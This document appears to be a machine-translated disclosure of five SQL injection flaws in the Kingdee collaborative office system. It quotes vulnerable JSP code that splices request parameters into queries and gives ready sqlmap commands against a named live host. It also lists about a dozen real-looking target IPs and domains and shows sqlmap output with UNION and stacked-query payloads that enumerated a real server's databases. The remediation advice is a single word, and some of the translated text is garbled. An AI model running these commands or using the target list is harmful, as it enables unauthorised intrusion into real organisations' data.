Kingdee collaborative office system has five high-risk SQL Injection Vulnerabilities

Kingdee collaborative office system has five high-risk SQL Injection Vulnerabilities

Kingdee collaborative office system has five high-risk SQL Injection Vulnerabilities

Files with vulnerabilities:
/Kingdee/Template/TemplateEdit. jsp? RecordID = 1
/Kingdee/Template/TemplateSave. jsp? FileName = 1
/Kingdee/DocumentEdit. jsp? RecordID = 1 & UserName = 1
/Kingdee/DocumentSave. jsp? RecordID = 1 & Template = 1 & Subject = 1 & Author = 1 & FileDate = 1 & FileType = 1 & HTMLPath = 1 RecordID Vulnerability
/Kingdee/DocumentShow. jsp? Template = 1 & UserName = 1 Template Vulnerability
All of the preceding vulnerabilities can run data directly using SQLMAP:

0x1/kingdee/Template/TemplateEdit. jsp vulnerability code

sysUtil.tools.weboffice.iDBManager2000 DbaObj=new sysUtil.tools.weboffice.iDBManager2000();if (DbaObj.OpenConnection()){String mSql="Select * From Template_File Where RecordID='"+ mRecordID + "'";try{  result=DbaObj.ExecuteQuery(mSql);  if (result.next())  { mRecordID=result.getString("RecordID"); mFileName=result.getString("FileName"); mFileType=result.getString("FileType"); mDescript=result.getString("Descript"); c_class=result.getString("c_class"); def_process=result.getString("def_process"); template_img=result.getString("template_img");  }sqlmap.py -u "http://oa.guanhao.com:8080/kingdee/Template/TemplateEdit.jsp?RecordID=1"

0x2/kingdee/Template/TemplateSave. jsp vulnerability code

String mRecordID=request.getParameter("RecordID");String mFileName=request.getParameter("FileName");String mDescript=request.getParameter("Descript");String c_class=request.getParameter("c_class");String def_process=request.getParameter("def_process");String user_id = PubFunc.toString(session.getAttribute("user_id"));String default_tmpl = PubFunc.toString(request.getParameter("default_tmpl"));String template_img = PubFunc.toString(request.getParameter("template_img"));new Person().set_default_tmpl(default_tmpl,c_class,user_id,"","gj","");sysUtil.tools.weboffice.iDBManager2000 DbaObj=new sysUtil.tools.weboffice.iDBManager2000();if (DbaObj.OpenConnection()){  java.sql.PreparedStatement prestmt=null;  String mSql="Update Template_File Set FileName = '"+ mFileName +"',Descript = '"+ mDescript +"',c_class="+c_class+",def_process='"+def_process+"',template_img='"+template_img+"' Where RecordID='"+ mRecordID +"'";  prestmt =DbaObj.Conn.prepareStatement(mSql);  //DbaObj.Conn.setAutoCommit(true) ;  prestmt.execute();  //DbaObj.Conn.commit();  prestmt.close();}DbaObj.CloseConnection();response.sendRedirect("TemplateList.jsp");%>sqlmap.py -u "http://oa.guanhao.com:8080/kingdee/Template/TemplateSave.jsp?FileName=1"

0x3/kingdee/deleentedit. jsp vulnerability code

if (DbaObj.OpenConnection()){try{ String mSql=""; if (!mTemplate.equals("")) {  TableCtrl tc = new TableCtrl();  String t_mFileType = tc.getFieldValue("Template_File","FileType","RecordID='"+mTemplate+"'");  if (t_mFileType!=null && !t_mFileType.equals(""))   mFileType=t_mFileType; } mSql="Select * From Document Where RecordID='"+ mRecordID + "'";  result=DbaObj.ExecuteQuery(mSql);sqlmap.py -u "http://oa.guanhao.com:8080/kingdee/DocumentEdit.jsp?RecordID=1&UserName=1"

0x4/kingdee/DocumentSave. jsp vulnerability code

  String mRecordID=request.getParameter("RecordID");  if (mRecordID==null) mRecordID="";  String mTemplate=new String(request.getParameter("Template").getBytes("gbk"));  String mSubject=new String(request.getParameter("Subject").getBytes("gbk"));  String mAuthor=new String(request.getParameter("Author").getBytes("gbk"));  String mFileDate=new String(request.getParameter("FileDate").getBytes("gbk"));  String mFileType=new String(request.getParameter("FileType").getBytes("gbk"));  String mHTMLPath=new String(request.getParameter("HTMLPath").getBytes("gbk"));  String mysql = "";  boolean ishave = false;sysUtil.tools.weboffice.iDBManager2000 DbaObj=new sysUtil.tools.weboffice.iDBManager2000();if (DbaObj.OpenConnection()){  mysql="SELECT * from Document Where RecordID='" + mRecordID + "'";  //...}sqlmap.py -u "http://oa.guanhao.com:8080/kingdee/DocumentSave.jsp?RecordID=1&Template=1&Subject=1&Author=1&FileDate=1&FileType=1&HTMLPath=1" -p RecordID

0x5/kingdee/DocumentShow. jsp vulnerability code

try { String mSql=""; if (!mTemplate.equals("")) {  String t_mFileType = db.getFieldValue("Template_File","FileType","RecordID='"+mTemplate+"'");  if (t_mFileType!=null && !t_mFileType.equals(""))   mFileType=t_mFileType; }sqlmap.py -u "http://oa.guanhao.com:8080/kingdee/DocumentShow.jsp?Template=1&UserName=1"

Data that runs out of SQLMAP:
Sqlmap. py-u "http://oa.guanhao.com: 8080/kingdee/Template/TemplateEdit. jsp? RecordID = 1 "-- dbs

Several vulnerability cases are provided:
Http: // 221.226.149.17: 8080/kingdee/login/loginpage. jsp
Http: // 122.139.60.103: 800/kingdee/login/loginpage. jsp
Http://oa.guanhao.com: 8080/kingdee/login/loginpage. jsp
Http: // 222.179.238.182: 8082/kingdee/login/loginpage2.jsp
Http://222.134.77.23: 8080/kingdee/login/loginpage. jsp
Http: // 221.4.245.218: 8080/kingdee/login/loginpage. jsp
Http: // 221.226.149.17: 8080/kingdee/login/loginpage. jsp
Http: // 220.189.244.202: 8080/kingdee/login/loginpage. jsp
Http://222.133.44.10: 8080/kingdee/login/loginpage. jsp
Http: // 223.95.183.6: 8080/kingdee/login/loginpage. jsp
Http: // 61.190.20.51/kingdee/login/loginpage. jsp
Http: // 60.194.110.187/kingdee/login/loginpage. jsp
Http://oa.roen.cn/kingdee/login/loginpage.jsp

sqlmap.py -u "http://oa.guanhao.com:8080/kingdee/Template/TemplateEdit.jsp?RecordID=1" --dbs         _ ___ ___| |_____ ___ ___  {1.0-dev-nongit-20150423}|_ -| . | |     | .'| . ||___|_  |_|_|_|_|__,|  _|      |_|           |_|   http://sqlmap.org[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program[*] starting at 21:59:58[21:59:59] [INFO] resuming back-end DBMS 'microsoft sql server'[21:59:59] [INFO] testing connection to the target URLsqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: RecordID (GET)    Type: stacked queries    Title: Microsoft SQL Server/Sybase stacked queries (comment)    Payload: RecordID=1';WAITFOR DELAY '0:0:5'--    Type: UNION query    Title: Generic UNION query (NULL) - 13 columns    Payload: RecordID=1' UNION ALL SELECT NULL,NULL,NULL,CHAR(113)+CHAR(98)+CHAR(118)+CHAR(113)+CHAR(113)+CHAR(104)+CHAR(81)+CHAR(120)+CHAR(109)+CHAR(90)+CHAR(122)+CHAR(97)+CHAR(81)+CHAR(74)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(113)+CHAR(106)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-----[22:00:00] [INFO] the back-end DBMS is Microsoft SQL Serverweb application technology: JSPback-end DBMS: Microsoft SQL Server 2005[22:00:00] [INFO] fetching database names[22:00:00] [INFO] the SQL query used returns 6 entries[22:00:00] [INFO] resumed: ghcoa[22:00:00] [INFO] resumed: ghtest[22:00:00] [INFO] resumed: master[22:00:00] [INFO] resumed: model[22:00:00] [INFO] resumed: msdb[22:00:00] [INFO] resumed: tempdbavailable databases [6]:[*] ghcoa[*] ghtest[*] master[*] model[*] msdb[*] tempdb[22:00:00] [INFO] fetched data logged to text files under 'C:\Users\Administrator\.sqlmap\output\oa.guanhao.com'[*] shutting down at 22:00:00

Solution: Filter